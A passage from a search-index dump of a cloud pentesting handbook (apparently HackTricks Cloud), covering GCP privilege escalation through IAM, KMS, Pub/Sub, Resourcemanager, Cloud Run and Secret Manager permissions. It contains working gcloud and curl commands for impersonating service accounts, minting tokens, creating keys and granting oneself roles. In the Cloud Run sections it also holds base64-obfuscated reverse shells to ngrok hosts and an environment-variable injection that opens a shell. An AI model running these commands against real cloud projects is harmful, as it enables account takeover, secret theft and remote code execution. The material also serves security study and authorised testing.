(iam.roles.get)","id":"1077","title":"iam.roles.update (iam.roles.get)"},"1078":{"body":"An attacker with the mentioned permissions will be able to request an access token that belongs to a Service Account , so it\'s possible to request an access token of a Service Account with more privileges than ours. bash gcloud --impersonate-service-account=\\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ auth print-access-token You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1078","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1079":{"body":"An attacker with the mentioned permissions will be able to create a user-managed key for a Service Account , which will allow us to access GCP as that Service Account. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research . Note that iam.serviceAccountKeys.update won\'t work to modify the key of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1079","title":"iam.serviceAccountKeys.create"},"108":{"body":"The basic github environment structure of a big company is to own an enterprise which owns several organizations and each of them may contain several repositories and several teams. . Smaller companies may just own one organization and no enterprises . From a user point of view a user can be a member of different enterprises and organizations . Within them the user may have different enterprise, organization and repository roles . Moreover, a user may be part of different teams with different enterprise, organization or repository roles. And finally repositories may have special protection mechanisms .","breadcrumbs":"Github Security » Basic Github Information » Basic Structure","id":"108","title":"Basic Structure"},"1080":{"body":"If you have the iam.serviceAccounts.implicitDelegation permission on a Service Account that has the iam.serviceAccounts.getAccessToken permission on a third Service Account, then you can use implicitDelegation to create a token for that third Service Account . Here is a diagram to help explain. Note that according to the documentation , the delegation of gcloud only works to generate a token using the generateAccessToken() method. So here you have how to get a token using the API directly: bash curl -X POST \\\\ \'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\'\\"${TARGET_SERVICE_ACCOUNT}\\"\':generateAccessToken\' \\\\ -H \'Content-Type: application/json\' \\\\ -H \'Authorization: Bearer \'\\"$(gcloud auth print-access-token)\\" \\\\ -d \'{ \\"delegates\\": [\\"projects/-/serviceAccounts/\'\\"${DELEGATED_SERVICE_ACCOUNT}\\"\'\\"], \\"scope\\": [\\"https://www.googleapis.com/auth/cloud-platform\\"] }\' You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1080","title":"iam.serviceAccounts.implicitDelegation"},"1081":{"body":"An attacker with the mentioned permissions will be able to sign of arbitrary payloads in GCP . So it\'ll be possible to create an unsigned JWT of the SA and then send it as a blob to get the JWT signed by the SA we are targeting. For more information read this . You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here and here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1081","title":"iam.serviceAccounts.signBlob"},"1082":{"body":"An attacker with the mentioned permissions will be able to sign well-formed JSON web tokens (JWTs) . The difference with the previous method is that instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT . This makes it easier to use but you can only sign JWT instead of any bytes. You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1082","title":"iam.serviceAccounts.signJwt"},"1083":{"body":"An attacker with the mentioned permissions will be able to add IAM policies to service accounts . You can abuse it to grant yourself the permissions you need to impersonate the service account. In the following example we are granting ourselves the roles/iam.serviceAccountTokenCreator role over the interesting SA: bash gcloud iam service-accounts add-iam-policy-binding \\"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ --member=\\"user:username@domain.com\\" \\\\ --role=\\"roles/iam.serviceAccountTokenCreator\\" # If you still have prblem grant yourself also this permission\\ngcloud iam service-accounts add-iam-policy-binding \\"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ \\\\ --member=\\"user:username@domain.com\\" \\\\ --role=\\"roles/iam.serviceAccountUser\\" You can find a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1083","title":"iam.serviceAccounts.setIamPolicy"},"1084":{"body":"The iam.serviceAccounts.actAs permission is like the iam:PassRole permission from AWS . It\'s essential for executing tasks, like initiating a Compute Engine instance, as it grants the ability to \\"actAs\\" a Service Account, ensuring secure permission management. Without this, users might gain undue access. Additionally, exploiting the iam.serviceAccounts.actAs involves various methods, each requiring a set of permissions, contrasting with other methods that need just one. Service account impersonation Impersonating a service account can be very useful to obtain new and better privileges . There are three ways in which you can impersonate another service account : Authentication using RSA private keys (covered above) Authorization using Cloud IAM policies (covered here) Deploying jobs on GCP services (more applicable to the compromise of a user account)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.actAs","id":"1084","title":"iam.serviceAccounts.actAs"},"1085":{"body":"An attacker with the mentioned permissions will be able to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource. According to this interesting post , it\'s necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT. You can generate an OpenIDToken (if you have the access) with: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\\n# Then, generate token\\ngcloud auth print-identity-token \\"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" --audiences=https://example.com Then you can just use it to access the service with: bash curl -v -H \\"Authorization: Bearer id_token\\" https://some-cloud-run-uc.a.run.app Some services that support authentication via this kind of tokens are: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (if using Google OIDC) You can find an example on how to create and OpenID token behalf a service account here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1085","title":"iam.serviceAccounts.getOpenIdToken"},"1086":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » References","id":"1086","title":"References"},"1087":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1087","title":"GCP - KMS Privesc"},"1088":{"body":"Info about KMS: GCP - KMS Enum Note that in KMS the permission are not only inherited from Orgs, Folders and Projects but also from Keyrings .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1088","title":"KMS"},"1089":{"body":"You can use this permission to decrypt information with the key you have this permission over. bash gcloud kms decrypt \\\\ --location=[LOCATION] \\\\ --keyring=[KEYRING_NAME] \\\\ --key=[KEY_NAME] \\\\ --version=[KEY_VERSION] \\\\ --ciphertext-file=[ENCRYPTED_FILE_PATH] \\\\ --plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1089","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"109":{"body":"","breadcrumbs":"Github Security » Basic Github Information » Privileges","id":"109","title":"Privileges"},"1090":{"body":"An attacker with this permission could give himself permissions to use the key to decrypt information. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\\ --location [LOCATION] \\\\ --keyring [KEYRING_NAME] \\\\ --member [MEMBER] \\\\ --role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1090","title":"cloudkms.cryptoKeys.setIamPolicy"},"1091":{"body":"Here\'s a conceptual breakdown of how this delegation works: Service Account A has direct access to decrypt using a specific key in KMS. Service Account B is granted the useToDecryptViaDelegation permission. This allows it to request KMS to decrypt data on behalf of Service Account A. The usage of this permission is implicit in the way that the KMS service checks permissions when a decryption request is made. When you make a standard decryption request using the Google Cloud KMS API (in Python or another language), the service checks whether the requesting service account has the necessary permissions . If the request is made by a service account with the useToDecryptViaDelegation permission, KMS verifies whether this account is allowed to request decryption on behalf of the entity that owns the key . Setting Up for Delegation Define the Custom Role : Create a YAML file (e.g., custom_role.yaml) that defines the custom role. This file should include the cloudkms.cryptoKeyVersions.useToDecryptViaDelegation permission. Here\'s an example of what this file might look like: yaml title: \\"KMS Decryption via Delegation\\"\\ndescription: \\"Allows decryption via delegation\\"\\nstage: \\"GA\\"\\nincludedPermissions: - \\"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\\" Create the Custom Role Using the gcloud CLI : Use the following command to create the custom role in your Google Cloud project: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Replace [YOUR_PROJECT_ID] with your Google Cloud project ID. Grant the Custom Role to a Service Account : Assign your custom role to a service account that will be using this permission. Use the following command: bash # Give this permission to the service account to impersonate\\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\\ --member \\"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\\" \\\\ --role \\"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\\" # Give this permission over the project to be able to impersonate any SA\\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\\ --member=\\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\\" \\\\ --role=\\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\\" Replace [YOUR_PROJECT_ID] and [SERVICE_ACCOUNT_EMAIL] with your project ID and the email of the service account, respectively. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1091","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1092":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1092","title":"GCP - Orgpolicy Privesc"},"1093":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1093","title":"orgpolicy"},"1094":{"body":"An attacker leveraging orgpolicy.policy.set can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint appengine.disableCodeDownload usually blocks downloading of App Engine source code. However, by using orgpolicy.policy.set , an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected. bash # Get info\\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] A python script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1094","title":"orgpolicy.policy.set"},"1095":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » References","id":"1095","title":"References"},"1096":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1096","title":"GCP - Pubsub Privesc"},"1097":{"body":"Get more information in: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1097","title":"PubSub"},"1098":{"body":"The snapshots of topics contain the current unACKed messages and every message after it . You could create a snapshot of a topic to access all the messages , avoiding access the topic directly .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1098","title":"pubsub.snapshots.create"},"1099":{"body":"Assign the pervious permissions to you.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1099","title":"pubsub.snapshots.setIamPolicy"},"11":{"body":"The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This \\"poisons\\" the CI pipeline, leading to the execution of these malicious commands. For a malicious actor to be successful performing a PPE attack he needs to be able to: Have write access to the VCS platform , as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). Note that sometimes an external PR count as \\"write access\\" . Even if he has write permissions, he needs to be sure he can modify the CI config file or other files the config is relying on . For this, he might need to be able to bypass branch protections . There are 3 PPE flavours: D-PPE : A Direct PPE attack occurs when the actor modifies the CI config file that is going to be executed. I-DDE : An Indirect PPE attack occurs when the actor modifies a file the CI config file that is going to be executed relays on (like a make file or a terraform config). Public PPE or 3PE : In some cases the pipelines can be triggered by users that doesn\'t have write access in the repo (and that might not even be part of the org) because they can send a PR. 3PE Command Injection : Usually, CI/CD pipelines will set environment variables with information about the PR . If that value can be controlled by an attacker (like the title of the PR) and is used in a dangerous place (like executing sh commands ), an attacker might inject commands in there .","breadcrumbs":"Pentesting CI/CD Methodology » PPE - Poisoned Pipeline Execution","id":"11","title":"PPE - Poisoned Pipeline Execution"},"110":{"body":"Enterprise owner : People with this role can manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations . However, they cannot access organization settings or content unless they are made an organization owner or given direct access to an organization-owned repository Enterprise members : Members of organizations owned by your enterprise are also automatically members of the enterprise .","breadcrumbs":"Github Security » Basic Github Information » Enterprise Roles","id":"110","title":"Enterprise Roles"},"1100":{"body":"You can create a push subscription in a topic that will be sending all the received messages to the indicated URL","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1100","title":"pubsub.subscriptions.create"},"1101":{"body":"Set your own URL as push endpoint to steal the messages.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1101","title":"pubsub.subscriptions.update"},"1102":{"body":"Access messages using the subscription.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1102","title":"pubsub.subscriptions.consume"},"1103":{"body":"Give yourself any of the preiovus permissions tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1103","title":"pubsub.subscriptions.setIamPolicy"},"1104":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1104","title":"GCP - Resourcemanager Privesc"},"1105":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1105","title":"resourcemanager"},"1106":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at organization level. So, you can follow the same exploitation example.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1106","title":"resourcemanager.organizations.setIamPolicy"},"1107":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at folder level. So, you can follow the same exploitation example.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1107","title":"resourcemanager.folders.setIamPolicy"},"1108":{"body":"Like in the exploitation of iam.serviceAccounts.setIamPolicy, this permission allows you to modify your permissions against any resource at project level. So, you can follow the same exploitation example. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1108","title":"resourcemanager.projects.setIamPolicy"},"1109":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Run Privesc","id":"1109","title":"GCP - Run Privesc"},"111":{"body":"In an organisation users can have different roles: Organization owners : Organization owners have complete administrative access to your organization . This role should be limited, but to no less than two people, in your organization. Organization members : The default , non-administrative role for people in an organization is the organization member. By default, organization members have a number of permissions . Billing managers : Billing managers are users who can manage the billing settings for your organization , such as payment information. Security Managers : It\'s a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to manage security alerts and settings across your organization, as well as read permissions for all repositories in the organization. If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. Github App managers : To allow additional users to manage GitHub Apps owned by an organization , an owner can grant them GitHub App manager permissions. Outside collaborators : An outside collaborator is a person who has access to one or more organization repositories but is not explicitly a member of the organization. You can compare the permissions of these roles in this table: https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles","breadcrumbs":"Github Security » Basic Github Information » Organization Roles","id":"111","title":"Organization Roles"},"1110":{"body":"For more information about Cloud Run check: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1110","title":"Cloud Run"},"1111":{"body":"An attacker with these permissions to create a run service running arbitrary code (arbitrary Docker container), attach a Service Account to it, and make the code exfiltrate the Service Account token from the metadata . An exploit script for this method can be found here and the Docker image can be found here . Note that when using gcloud run deploy instead of just creating the service it needs the update permission . Check an example here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1111","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1112":{"body":"Like the previous one but updating a service: bash # Launch some web server to listen in port 80 so the service works\\necho \\"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\\" | base64\\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\\\\n--image=ubuntu:22.04 \\\\ # Make sure to use an ubuntu version that includes python3\\n--command=bash \\\\\\n--args=\\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\\" \\\\\\n--service-account=\\"-compute@developer.gserviceaccount.com\\" \\\\\\n--region=us-central1 \\\\\\n--allow-unauthenticated # If you don\'t have permissions to use \\"--allow-unauthenticated\\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1112","title":"run.services.update , iam.serviceAccounts.actAs"},"1113":{"body":"Give yourself previous permissions over cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1113","title":"run.services.setIamPolicy"},"1114":{"body":"Launch a job with a reverse shell to steal the service account indicated in the command. You can find an exploit here . bash gcloud beta run jobs create jab-cloudrun-3326 \\\\\\n--image=ubuntu:latest \\\\\\n--command=bash \\\\\\n--args=\\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\\" \\\\\\n--service-account=\\"@$PROJECT_ID.iam.gserviceaccount.com\\" \\\\\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1114","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1115":{"body":"Similar to the previous one it\'s possible to update a job and update the SA , the command and execute it : bash gcloud beta run jobs update hacked \\\\\\n--image=mubuntu:latest \\\\\\n--command=bash \\\\\\n--args=\\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\\" \\\\\\n--service-account=-compute@developer.gserviceaccount.com \\\\\\n--region=us-central1 \\\\\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1115","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"1116":{"body":"Give yourself the previous permissions over Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1116","title":"run.jobs.setIamPolicy"},"1117":{"body":"Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: bash gcloud beta run jobs execute job-name --region --update-env-vars=\\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c \'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1\' #%s\\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1117","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1118":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » References","id":"1118","title":"References"},"1119":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1119","title":"GCP - Secretmanager Privesc"},"112":{"body":"In https://github.com/organizations//settings/member_privileges you can see the permissions users will have just for being part of the organisation . The settings here configured will indicate the following permissions of members of the organisation: Be admin, writer, reader or no permission over all the organisation repos. If members can create private, internal or public repositories. If forking of repositories is possible If it\'s possible to invite outside collaborators If public or private sites can be published The permissions admins has over the repositories If members can create new teams","breadcrumbs":"Github Security » Basic Github Information » Members Privileges","id":"112","title":"Members Privileges"},"1120":{"body":"For more information about secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1120","title":"secretmanager"},"1121":{"body":"This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): bash # Get clear-text of version 1 of secret: \\"\\"\\ngcloud secrets versions access 1 --secret=\\"\\" As this is also a post exploitation technique it can be found in: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1121","title":"secretmanager.versions.access"},"1122":{"body":"This give you access to give you access to read the secrets from the secret manager, like using: bash gcloud secrets add-iam-policy-binding \\\\ --member=\\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\\" \\\\ --role=\\"roles/secretmanager.secretAccessor\\" tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1122","title":"secretmanager.secrets.setIamPolicy"},"1123":{"body":"Reading time: 3 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1123","title":"GCP - Serviceusage Privesc"},"1124":{"body":"The following permissions are useful to create and steal API keys, not this from the docs: An API key is a simple encrypted string 